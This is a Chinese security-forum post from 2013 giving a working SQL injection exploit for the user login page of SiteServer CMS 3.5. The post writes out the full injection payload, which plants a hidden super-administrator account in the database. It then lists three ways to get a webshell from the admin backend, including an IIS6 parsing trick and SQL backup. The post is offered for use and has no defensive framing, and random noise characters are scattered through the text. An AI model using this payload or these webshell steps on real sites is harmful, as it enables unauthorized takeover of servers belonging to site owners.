找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2633|回复: 0
打印 上一主题 下一主题

SiteServer CMS UserCenter/login.aspx页面用户名处sql注射

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-16 21:40:46 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
经测试秒杀最新的3.5版
+ \! D- a  G1 K2 a- W9 Bstieserver官网:www.siteserver.cn
7 S4 o% z4 R5 S( y6 g1 CEXP:. V8 Z2 W* E: M! I
直接访问UserCenter/login.aspx
3 Z) P) \! ^7 M2 [; e" J9 ~用户名处输入:+ ~+ @5 o* {2 Z7 w, Z4 q6 R$ q

3 g/ K9 e+ Y+ H' C/ k$ D123′insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values(‘blue’,'VffSUZcBPo4=’,'Encrypted’,'i7jq4LwC25wKDoqHErBWaw==’);insert into bairong_AdministratorsInRoles values(‘Administrator’,'blue’);insert into bairong_AdministratorsInRoles values(‘RegisteredUser’,'blue’);insert into bairong_AdministratorsInRoles values(‘ConsoleAdministrator’,'blue’);–
- k7 ^; `, `: l5 f% y' z) Q密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue  密码为lanhai的超级用户。
. u6 M- k6 }0 }) s* P0 h: L2 _之后再访问后台SiteServer/login.aspx用插入的用户登陆
& X8 t! w9 w2 x( p3 F后台拿webshell的三种方法:
6 A# ?8 u6 k% @* ^一、
- w6 o- d1 s9 C1 r% s站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx) C. Z+ w* P+ [
二、
5 v" s& B% S5 Z+ o成员权限-》添加用户-》用户名为:1.asp5 n" V! l9 J  N3 H3 m$ _7 h# n
http://127.0.0.1/usercenter/7 V7 O6 h! ^2 j+ M- z
用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell9 X* e& d, R* b" H; N- z1 ~% W
(ps:后台添加用户时不会验证是否含有非法字符)! f& I$ c+ X/ g
三、
( q4 V* r# e+ T; ]系统工具-》实用工具-》机器参数查看
+ u, ]) b; R5 S3 v可以看到数据库类型、名称,WEB路径
$ d1 T/ R8 c! I* x0 F1 }7 B  C' k系统工具-》数据库工具-》SQL语句查询
2 B( a& J6 Q- q" m9 n  c: j+ p; a* C这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表